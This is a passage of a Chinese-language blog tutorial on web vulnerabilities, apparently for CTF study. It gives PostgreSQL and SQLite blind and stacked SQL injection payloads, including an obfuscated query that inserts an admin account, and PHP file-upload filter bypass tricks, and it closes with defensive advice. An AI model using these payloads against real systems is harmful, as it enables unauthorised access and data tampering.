</code></pre></div></div> <h4 id="延时">延时</h4> <p>pg_sleep(5)</p> <p>方式：</p> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">1</span><span class="p">.</span><span class="k">select</span> <span class="mi">1</span><span class="o">=</span><span class="p">(</span><span class="k">case</span> <span class="k">when</span> <span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="k">then</span> <span class="p">(</span><span class="k">select</span> <span class="mi">1</span> <span class="k">from</span> <span class="n">pg_sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">))</span> <span class="k">else</span> <span class="mi">0</span> <span class="k">end</span><span class="p">);</span>
<span class="mi">2</span><span class="p">.</span><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">users</span> <span class="k">where</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">and</span> <span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">case</span> <span class="k">when</span> <span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="k">then</span> <span class="n">pg_sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)::</span><span class="nb">VARCHAR</span> <span class="k">else</span> <span class="s1">'a'</span> <span class="k">end</span><span class="p">)</span>
<span class="mi">3</span><span class="p">.</span><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">users</span> <span class="k">where</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">and</span> <span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">case</span> <span class="k">when</span> <span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="k">then</span> <span class="n">pg_sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span><span class="o">||</span><span class="s1">'b'</span> <span class="k">else</span> <span class="s1">'a'</span> <span class="k">end</span><span class="p">)</span>
  <span class="o">#</span><span class="err">在该数据库中</span><span class="o">||</span><span class="err">代表字符串拼接</span>
</code></pre></div></div> <h4 id="堆叠注入">堆叠注入</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">create</span> <span class="k">function</span> <span class="n">ddkkk</span><span class="p">(</span><span class="n">bd</span> <span class="nb">text</span><span class="p">)</span> <span class="k">returns</span> <span class="nb">integer</span> <span class="k">as</span><span class="err">$$</span> <span class="k">BEGIN</span> <span class="k">execute</span> <span class="n">bd</span><span class="p">;</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="k">END</span><span class="p">;</span> <span class="err">$$</span> <span class="k">language</span> <span class="n">plpgsql</span><span class="p">;</span>
<span class="k">select</span> <span class="n">ddkkk</span><span class="p">(</span><span class="s1">'i'</span><span class="o">||</span><span class="s1">'n'</span><span class="o">||</span><span class="s1">'s'</span><span class="o">||</span><span class="s1">'e'</span><span class="o">||</span><span class="s1">'r'</span><span class="o">||</span><span class="s1">'t'</span><span class="o">||</span><span class="s1">' '</span><span class="o">||</span><span class="s1">'i'</span><span class="o">||</span><span class="s1">'n'</span><span class="o">||</span><span class="s1">'t'</span><span class="o">||</span><span class="s1">'o'</span><span class="o">||</span><span class="s1">''</span><span class="o">||</span><span class="s1">'users(username, p'</span><span class="o">||</span><span class="s1">'a'</span><span class="o">||</span><span class="s1">'s'</span><span class="o">||</span><span class="s1">'sword)'</span><span class="o">||</span><span class="s1">' values(</span><span class="se">''</span><span class="s1">admin</span><span class="se">''</span><span class="s1">,</span><span class="se">''</span><span class="s1">adddd</span><span class="se">''</span><span class="s1">);'</span><span class="p">);</span>
<span class="k">COMMIT</span><span class="p">;</span> <span class="k">select</span> <span class="s1">'asdfasdf'</span><span class="p">::</span><span class="nb">integer</span><span class="p">;</span> <span class="c1">--</span>
</code></pre></div></div> <h3 id="sqlite-注入">SQLite 注入</h3> <h4 id="注释符">注释符</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**/</span>
<span class="c1">--</span>
<span class="err">可用</span><span class="o">#</span><span class="err">判断，如果</span><span class="o">#</span><span class="err">不管用则不是</span><span class="n">mysql</span>
</code></pre></div></div> <h4 id="查询表名">查询表名</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">tbl_name</span> <span class="k">FROM</span> <span class="n">sqlite_master</span> <span class="k">WHERE</span> <span class="k">type</span><span class="o">=</span><span class="s1">'table'</span> <span class="k">and</span> <span class="n">tbl_name</span> <span class="k">NOT</span> <span class="k">like</span> <span class="s1">'sqlite_%'</span>
<span class="o">#</span><span class="err">过滤</span><span class="n">sqlite</span><span class="err">开头的系统表名</span>
</code></pre></div></div> <h4 id="查询列名">查询列名</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="k">sql</span> <span class="k">FROM</span> <span class="n">sqlite_master</span> <span class="k">WHERE</span> <span class="k">type</span><span class="o">!=</span><span class="s1">'meta'</span> <span class="k">AND</span> <span class="k">sql</span> <span class="k">NOT</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">name</span> <span class="o">=</span><span class="s1">'table_name'</span>
</code></pre></div></div> <h4 id="字符串截取">字符串截取</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">substr</span><span class="p">()</span> <span class="k">substring</span><span class="p">()</span> <span class="k">like</span> <span class="o">=</span> <span class="o">&gt;</span> <span class="o">&lt;</span> <span class="k">in</span> <span class="k">between</span> <span class="err">于</span><span class="n">mysql</span><span class="err">差不多</span>
 <span class="err">特有的：</span> <span class="k">trim</span><span class="err">、</span><span class="n">ltrim</span><span class="err">、</span><span class="n">rtrim</span><span class="err">、</span><span class="n">printf</span>
 <span class="k">trim</span> <span class="err">：</span><span class="k">TRIM</span> <span class="p">(</span><span class="err">字符串</span><span class="p">,</span><span class="err">要移除的字符</span><span class="p">)</span> <span class="err">如果要移除的字符不写，默认是空格</span>
 <span class="n">printf</span> <span class="err">：</span>
  <span class="k">select</span> <span class="n">printf</span><span class="p">(</span><span class="s1">'%.1s'</span><span class="p">,</span><span class="s1">'abc'</span><span class="p">)</span> <span class="o">=</span> <span class="n">a</span>
  <span class="err">如果</span><span class="n">printf</span><span class="p">(</span><span class="s1">'%.is'</span><span class="p">,</span> <span class="s1">'abc'</span><span class="p">)</span><span class="o">=</span><span class="n">printf</span><span class="p">(</span><span class="s1">'%.i+1s'</span><span class="p">,</span> <span class="s1">'abc'</span><span class="p">)</span> <span class="err">则说明字符串长度为</span><span class="n">i</span>
</code></pre></div></div> <h4 id="字符串比较">字符串比较</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">1</span><span class="p">.</span><span class="err">与</span><span class="n">mysql</span><span class="err">同部分略</span>
<span class="mi">2</span><span class="p">.</span><span class="n">GLOB</span> <span class="err">运算符相当于等于，且其遵循</span><span class="n">unix</span><span class="err">语法</span>
</code></pre></div></div> <h4 id="条件">条件</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">1</span><span class="p">.</span><span class="k">case</span> <span class="k">when</span> <span class="n">X</span> <span class="k">then</span> <span class="n">Y</span> <span class="k">else</span> <span class="n">Z</span> <span class="k">end</span> <span class="err">这个语句和</span><span class="n">mysql</span><span class="err">是相同的</span>
<span class="mi">2</span><span class="p">.</span><span class="err">还可以写作</span> <span class="n">iif</span><span class="p">(</span><span class="n">X</span><span class="p">,</span><span class="n">Y</span><span class="p">,</span><span class="n">Z</span><span class="p">)</span>

<span class="err">注意</span><span class="p">:</span>
<span class="n">sqlite</span><span class="err">中没有</span><span class="n">if</span><span class="err">语句</span>
<span class="n">iif</span><span class="err">只有</span><span class="k">version</span><span class="o">&gt;=</span><span class="mi">3</span><span class="p">.</span><span class="mi">32</span><span class="err">可用</span>
</code></pre></div></div> <h4 id="构造报错">构造报错</h4> <p>mysql 中可以使用 exp(999999) cot(0) 等等。</p> <p>sqlite 中使用 randomblob(N) 返回 N-byte blob</p> <h4 id="时间盲注">时间盲注</h4> <p>sqlite 中并没有 sleep() 这样的延时函数</p> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="mi">123</span><span class="o">=</span><span class="k">LIKE</span><span class="p">(</span><span class="s1">'ABCDEFG'</span><span class="p">,</span><span class="k">UPPER</span><span class="p">(</span><span class="n">HEX</span><span class="p">(</span><span class="n">RANDOMBLOB</span><span class="p">([</span><span class="err">秒</span><span class="p">]</span><span class="mi">00000000</span><span class="o">/</span><span class="mi">2</span><span class="p">))))</span>
</code></pre></div></div> <hr> <h2 id="五php-文件上传漏洞">五、PHP 文件上传漏洞</h2> <h3 id="前端验证的绕过">前端验证的绕过</h3> <p>禁用 js 或者用 burp 抓包改包</p> <h3 id="mime-type-绕过">MIME-TYPE 绕过</h3> <p>burp 修改 content-type</p> <h3 id="黑名单后缀绕过">黑名单后缀绕过</h3> <p>可以考虑大小写绕过，php2 php3 php4 类推以及 phtml 等</p> <p>双写绕过</p> <p><strong>反斜线拆分绕过：</strong></p> <p>当文件名被过滤时，可以使用反斜线拆分绕过。</p> <h3 id="文件内容的绕过">文件内容的绕过</h3> <p>文件内容绕过主要包括：</p> <ol> <li> <strong>文件头绕过</strong> - 在文件开头添加图片文件头（如 GIF89a）来绕过内容检测</li> <li> <strong>短标签绕过</strong> - 使用 <code class="language-plaintext highlighter-rouge">&lt;?=</code> 代替 <code class="language-plaintext highlighter-rouge">&lt;?php</code> </li> <li> <strong>注释绕过</strong> - 在 PHP 代码中添加注释来分割关键字</li> <li> <strong>字符串拼接绕过</strong> - 使用字符串拼接来绕过关键字检测</li> <li> <strong>编码绕过</strong> - 使用 base64、rot13 等编码方式</li> </ol> <hr> <h2 id="六数据库基础">六、数据库基础</h2> <h3 id="数据库简介">数据库简介</h3> <p>数据库，又称为数据管理系统，简而言之可视为电子化的文件柜——存储电子文件的处所，用户可以对文件中的数据运行新增、截取、更新、删除等操作。</p> <p>所谓”数据库”系以一定方式储存在一起、能予多个用户共享、具有尽可能小的冗余度、与应用程序彼此独立的数据集合。一个数据库由多个表空间（Tablespace）构成。</p> <h3 id="常见数据库">常见数据库</h3> <ul> <li>MYSQL</li> <li>SQL SERVER</li> <li>Oracle</li> <li>Postgres</li> <li>SQLite</li> </ul> <h3 id="sql-语法基础">SQL 语法基础</h3> <p>注：SQL 语法对于大小写不敏感</p> <h4 id="查看创建的数据库">查看创建的数据库</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SHOW</span> <span class="n">DATABASES</span><span class="p">;</span>
</code></pre></div></div> <h4 id="创建并切换数据库">创建并切换数据库</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">test</span><span class="p">;</span>
<span class="n">USE</span> <span class="n">test</span><span class="p">;</span>
</code></pre></div></div> <h4 id="查看数据库里所有表">查看数据库里所有表</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SHOW</span> <span class="n">TABLES</span><span class="p">;</span>
</code></pre></div></div> <h4 id="创建表并查看表结构">创建表并查看表结构</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">testtable</span> <span class="p">(</span>
    <span class="n">id</span> <span class="nb">int</span><span class="p">(</span><span class="mi">11</span><span class="p">)</span> <span class="n">auto_increment</span> <span class="k">primary</span> <span class="k">key</span><span class="p">,</span>
    <span class="n">name</span> <span class="nb">varchar</span><span class="p">(</span><span class="mi">256</span><span class="p">)</span>
<span class="p">);</span><span class="o">#</span> <span class="err">创建一个两列的表</span><span class="n">testtable</span><span class="err">，</span><span class="n">id</span> <span class="err">和</span> <span class="n">name</span><span class="err">，</span><span class="n">id</span> <span class="err">自动生成</span>

<span class="k">DESC</span> <span class="n">testtable</span><span class="p">;</span> <span class="o">#</span> <span class="err">展示</span> <span class="n">testtable</span> <span class="err">的表结构</span>
</code></pre></div></div> <h4 id="添加数据">添加数据</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">INSERT</span> <span class="k">INTO</span> <span class="n">testtable</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="k">VALUES</span><span class="p">(</span><span class="s1">'DASCTF'</span><span class="p">);</span>
<span class="o">#</span> <span class="err">往</span> <span class="n">testtable</span> <span class="err">表中插入一个数据，</span><span class="n">id</span> <span class="err">自动生成，</span><span class="n">name</span> <span class="err">为</span> <span class="n">DASCTF</span>
</code></pre></div></div> <h4 id="查询数据">查询数据</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">testtable</span><span class="p">;</span> <span class="o">#</span><span class="err">直接查询</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">testtable</span> <span class="k">WHERE</span> <span class="n">name</span><span class="o">=</span><span class="s1">'a'</span><span class="p">;</span> <span class="o">#</span> <span class="err">查询</span> <span class="n">name</span> <span class="err">为</span> <span class="n">a</span> <span class="err">的数据</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">testtable</span> <span class="k">WHERE</span> <span class="n">name</span><span class="o">=</span><span class="s1">'DASCTF'</span><span class="p">;</span> <span class="o">#</span> <span class="err">查询</span> <span class="n">name</span> <span class="err">为</span> <span class="n">DASCTF</span><span class="err">的数据</span>
</code></pre></div></div> <h4 id="修改数据">修改数据</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">UPDATE</span> <span class="n">testtable</span> <span class="k">SET</span> <span class="n">name</span><span class="o">=</span><span class="s1">'DASCTF777'</span><span class="p">;</span>
<span class="o">#</span> <span class="err">将表内数据</span> <span class="n">name</span> <span class="err">列内容改为</span> <span class="n">DASCTF777</span>
</code></pre></div></div> <h4 id="删除数据">删除数据</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">DELETE</span> <span class="k">FROM</span> <span class="n">testtable</span> <span class="k">WHERE</span> <span class="n">name</span><span class="o">=</span><span class="s1">'DASCTF777'</span><span class="p">;</span>
<span class="o">#</span> <span class="err">删除表中</span> <span class="n">name</span> <span class="err">为</span> <span class="n">DASCTF777</span> <span class="err">的数据</span>
</code></pre></div></div> <hr> <h2 id="总结">总结</h2> <p>Web 安全漏洞种类繁多，本文总结了常见的几种类型：</p> <ol> <li> <strong>文件包含漏洞</strong> - 通过包含恶意文件执行代码</li> <li> <strong>命令注入</strong> - 通过注入系统命令执行任意代码</li> <li> <strong>反序列化漏洞</strong> - 通过反序列化恶意对象执行代码</li> <li> <strong>其他数据库注入</strong> - PostgreSQL、SQLite 等数据库的注入方法</li> </ol> <p>在实际开发中，应该：</p> <ul> <li>对用户输入进行严格验证和过滤</li> <li>使用参数化查询防止 SQL 注入</li> <li>避免直接执行系统命令</li> <li>谨慎处理序列化数据</li> <li>定期进行安全审计和渗透测试</li> </ul> </div> </article> <br> <hr> <br> <ul class="list-disc pl-8"></ul> <h2 class="text-3xl font-semibold mb-4 mt-12">Enjoy Reading This Article?</h2> <p class="mb-2">Here are some more articles you might like to read next:</p> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/markdown-features-guide/">Markdown 功能使用指南</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/ROS%E6%9C%BA%E5%99%A8%E4%BA%BA%E5%BC%80%E5%8F%91%E5%AE%9E%E8%B7%B5/">ROS 机器人开发实践</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/ROS%E8%BF%90%E8%A1%8C%E7%AE%A1%E7%90%86%E4%B8%8E%E5%B8%B8%E7%94%A8%E7%BB%84%E4%BB%B6/">ROS 运行管理与常用组件</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/ROS%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8%E6%8C%87%E5%8D%97/">ROS 基础入门指南</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/MySQL%E6%B3%A8%E5%85%A5%E5%AE%8C%E6%95%B4%E6%8C%87%E5%8D%97/">MySQL 注入完整指南</a> </li> </div> </div> <footer class="fixed-bottom" role="contentinfo"> <div class="container mt-0"> © Copyright 2025 Robben Ge. © {{ site.time | date: "%Y" }} Robben Ge. All rights reserved. Built with [al-folio]( </div> </footer> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script src="/assets/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@5.0.0/imagesloaded.pkgd.min.js" integrity="sha256-htrLFfZJ6v5udOG+3kNLINIKh2gvoKqwEhHYfTTMICc=" crossorigin="anonymous"></script> <script defer src="/assets/js/masonry.js?a0db7e5d5c70cc3252b3138b0c91dcaf" type="text/javascript"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.1.0/dist/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js?85ddb88934d28b74e78031fd54cf8308"></script> <script src="/assets/js/no_defer.js?2781658a0a2b13ed609542042a859126"></script> <script defer src="/assets/js/common.js?c15de51d4bb57887caa2c21988d97279"></script> <script defer src="/assets/js/copy_code.js?c8a01c11a92744d44b093fc3bda915df" type="text/javascript"></script> <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script> <script async src="https://badge.dimensions.ai/badge.js"></script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js" integrity="sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI=" crossorigin="anonymous"></script> <script src="/assets/js/mathjax-setup.js?a5bb4e6a542c546dd929b24b8b236dfd"></script> <script defer src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script defer src="/assets/js/progress-bar.js?2f30e0e6801ea8f5036fa66e1ab0a71a" type="text/javascript"></script> <script src="/assets/js/vanilla-back-to-top.min.js?f40d453793ff4f64e238e420181a1d17"></script> <script>addBackToTop();</script> <script type="module" src="/assets/js/search/ninja-keys.min.js?230637657ac0b42e92d76e2b4c1b4764"></script> <ninja-keys hidebreadcrumbs noautoloadmdicons placeholder="Type to start searching"></ninja-keys> <script src="/assets/js/search-setup.js?6c304f7b1992d4b60f7a07956e52f04a"></script> <script src="/assets/js/search-data.js"></script> <script src="/assets/js/shortcut-key.js?6f508d74becd347268a7f822bca7309d"></script> </body> </html>